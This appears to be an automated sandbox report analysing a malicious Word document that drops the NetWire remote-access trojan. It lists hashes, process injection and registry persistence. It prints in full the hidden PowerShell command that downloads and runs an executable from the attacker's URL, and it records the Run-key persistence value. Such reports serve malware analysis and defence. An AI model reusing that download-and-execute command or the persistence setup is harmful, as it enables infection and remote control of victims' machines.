Analysis
- Max time kernel: 81s
- Max time network: 143s
- Platform: windows7_x64
- Resource: win7v20201028
- Submitted: 13-01-2021 09:17
- Static task: static1
- Behavioral task: behavioral1 (Sample: Pokana2021011357.doc; Resource: win7v20201028)
- Behavioral task: behavioral2 (Sample: Pokana2021011357.doc; Resource: win10v20201028)
General
- Target: Pokana2021011357.doc
- Size: 55KB
- MD5: 9a59fc2435737333486d786264c40542
- SHA1: 19ccdcf1cdafdd248080f7a0b4a481057125ebdf
- SHA256: ca7d0cd170dc326645352637b21087e96576f33aafebcb59cb3ea28952d7214d
- SHA512: eddb242b35355a91000d124a13bce5df1a929282f9ebf4554c261b14a1c473e75bf3c0d657f521b78d07e687ce26a749713a5aa9ffc908a53106b94744c69be5
Malware Config
- Extracted: http://one.oziriss.club:2095/ol/o1.exe
Signatures

NetWire RAT payload (6 IoCs)
Processes (resource | yara_rule):
- behavioral1/memory/1920-35-0x000000000009242D-mapping.dmp | netwire
- behavioral1/memory/1920-34-0x0000000000090000-0x00000000000C0000-memory.dmp | netwire
- behavioral1/memory/1920-37-0x0000000000090000-0x00000000000C0000-memory.dmp | netwire
- behavioral1/memory/1336-45-0x00000000000D242D-mapping.dmp | netwire
- behavioral1/memory/1336-44-0x00000000000D0000-0x0000000000100000-memory.dmp | netwire
- behavioral1/memory/1336-47-0x00000000000D0000-0x0000000000100000-memory.dmp | netwire

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1916 | 1580 | powershell.exe | WINWORD.EXE

Blocklisted process makes network request (1 IoC)
Processes (flow | pid | process):
- 6 | 1916 | powershell.exe

Executes dropped EXE (4 IoCs)
Processes (pid | process):
- 1696 | secure.exe
- 1920 | secure.exe
- 1384 | fers.exe
- 1336 | fers.exe

Loads dropped DLL (7 IoCs)
Processes (pid | process):
- 1916 | powershell.exe (4 entries)
- 1696 | secure.exe
- 1920 | secure.exe
- 1384 | fers.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes (description | ioc | process):
- Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ | fers.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\fers = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Crypto\\fers.exe" | fers.exe

Suspicious use of SetThreadContext (2 IoCs)
Processes (description | pid | process | target process):
- PID 1696 set thread context of 1920 | 1696 | secure.exe | secure.exe
- PID 1384 set thread context of 1336 | 1384 | fers.exe | fers.exe

Drops file in Windows directory (1 IoC)
Processes (description | ioc | process):
- File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings
Processes (description | ioc | process):
- Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
- Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
- Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
- Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
- Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
- Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (pid | process):
- 1580 | WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes (pid | process):
- 1916 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description | pid | process):
- Token: SeDebugPrivilege | 1916 | powershell.exe

Suspicious use of SetWindowsHookEx (16 IoCs)
Processes (pid | process):
- 1580 | WINWORD.EXE (16 entries)

Suspicious use of WriteProcessMemory (36 IoCs)
Processes (description | pid | process | target process):
- PID 1580 wrote to memory of 1916 | 1580 | WINWORD.EXE | powershell.exe (4 entries)
- PID 1916 wrote to memory of 1696 | 1916 | powershell.exe | secure.exe (7 entries)
- PID 1696 wrote to memory of 1920 | 1696 | secure.exe | secure.exe (9 entries)
- PID 1920 wrote to memory of 1384 | 1920 | secure.exe | fers.exe (7 entries)
- PID 1384 wrote to memory of 1336 | 1384 | fers.exe | fers.exe (9 entries)
Processes

1. WINWORD.EXE (PID 1580)
   Path: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
   Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Pokana2021011357.doc"
   - Drops file in Windows directory
   - Modifies Internet Explorer settings
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

2. powershell.exe (PID 1916, child of 1)
   Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
   Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://one.oziriss.club:2095/ol/o1.exe',$env:Temp+'\secure.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\secure.exe')
   - Process spawned unexpected child process
   - Blocklisted process makes network request
   - Loads dropped DLL
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory

3. secure.exe (PID 1696, child of 2)
   Path: C:\Users\Admin\AppData\Local\Temp\secure.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\secure.exe"
   - Executes dropped EXE
   - Loads dropped DLL
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory

4. secure.exe (PID 1920, child of 3)
   Path: C:\Users\Admin\AppData\Local\Temp\secure.exe
   Command line: C:\Users\Admin\AppData\Local\Temp\secure.exe
   - Executes dropped EXE
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory

5. fers.exe (PID 1384, child of 4)
   Path: C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
   Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe"
   - Executes dropped EXE
   - Loads dropped DLL
   - Suspicious use of SetThreadContext
   - Suspicious use of WriteProcessMemory

6. fers.exe (PID 1336, child of 5)
   Path: C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
   Command line: C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe
   - Executes dropped EXE
   - Adds Run key to start application
Downloads

- secure.exe (listed as C:\Users\Admin\AppData\Local\Temp\secure.exe and \Users\Admin\AppData\Local\Temp\secure.exe)
  MD5: b61d866837ca60df01c1465e028db4c9
  SHA1: 53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
  SHA256: b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
  SHA512: f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

- fers.exe (listed as C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe and \Users\Admin\AppData\Roaming\Microsoft\Crypto\fers.exe); its hashes are identical to secure.exe, so the persistence copy under AppData\Roaming is a byte-for-byte copy of the downloaded payload
  MD5: b61d866837ca60df01c1465e028db4c9
  SHA1: 53d4b6d751dcbf1cf6d8de3f8f50aedc2896d66a
  SHA256: b6c6f8ac58b7838c87ccf2b36b2f7005c6dd86792575e1e8c7ccce30d7d6a878
  SHA512: f02ece67642717bc55896d8802c6011e7023741583f05c09d626d326b5eba968ba3e7ccdde9c846d62389caf9ed9f6d63977fec2bd57195203f1b79cfff78070

- C:\Users\Admin\AppData\Roaming\trftkoxoicklgdxkctuphueti84738.png
  MD5: 8c6e2f2f47f6433efebd829c18f864d1
  SHA1: 15ebffc420841a18c1d47b6b40cfd9e7c632cf47
  SHA256: 94dcac78e40e701792770b08478c6b2c788ec0a21a953d82e6f968a1cef8698d
  SHA512: 86e2226fdb5bee0369d8f38bfb2e27270b9edd2b2d7c2fba76bacf51e8a53eeee1f21183bb7b75138757f198fe8513c423ce7fcbd7a740f37ca9ee68601c14db
Memory dumps
- memory/1336-45-0x00000000000D242D-mapping.dmp
- memory/1336-44-0x00000000000D0000-0x0000000000100000-memory.dmp (192KB)
- memory/1336-47-0x00000000000D0000-0x0000000000100000-memory.dmp (192KB)
- memory/1384-39-0x0000000000000000-mapping.dmp
- memory/1580-2-0x00000000006E4000-0x00000000006E8000-memory.dmp (16KB)
- memory/1696-30-0x0000000000000000-mapping.dmp
- memory/1916-7-0x0000000004650000-0x0000000004651000-memory.dmp (4KB)
- memory/1916-16-0x0000000006190000-0x0000000006191000-memory.dmp (4KB)
- memory/1916-25-0x00000000064B0000-0x00000000064B1000-memory.dmp (4KB)
- memory/1916-3-0x0000000000000000-mapping.dmp
- memory/1916-24-0x0000000006400000-0x0000000006401000-memory.dmp (4KB)
- memory/1916-17-0x00000000062B0000-0x00000000062B1000-memory.dmp (4KB)
- memory/1916-4-0x000000006AFA0000-0x000000006B68E000-memory.dmp (6.9MB)
- memory/1916-11-0x00000000056D0000-0x00000000056D1000-memory.dmp (4KB)
- memory/1916-6-0x00000000046D0000-0x00000000046D1000-memory.dmp (4KB)
- memory/1916-5-0x0000000001E60000-0x0000000001E61000-memory.dmp (4KB)
- memory/1916-8-0x0000000005280000-0x0000000005281000-memory.dmp (4KB)
- memory/1920-35-0x000000000009242D-mapping.dmp
- memory/1920-34-0x0000000000090000-0x00000000000C0000-memory.dmp (192KB)
- memory/1920-37-0x0000000000090000-0x00000000000C0000-memory.dmp (192KB)